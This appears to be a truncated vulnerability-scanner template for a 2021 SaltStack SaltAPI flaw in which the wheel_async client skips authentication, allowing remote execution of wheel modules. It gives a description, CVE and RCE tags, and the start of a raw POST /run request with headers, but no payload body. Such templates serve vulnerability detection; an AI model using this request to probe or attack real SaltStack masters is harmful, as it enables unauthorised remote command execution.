description:The SaltAPI does not honor eauth credentials for the wheel_async client. Thus, an attacker can remotely run any wheel modules on the master.
tags:cve,cve2021,saltapi,rce,saltstack
requests:
- raw:
- |
POST /run HTTP/1.1
Host:{{Hostname}}
Accept-Encoding:gzip, deflate
Accept:*/*
Accept-Language:en
User-Agent:Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0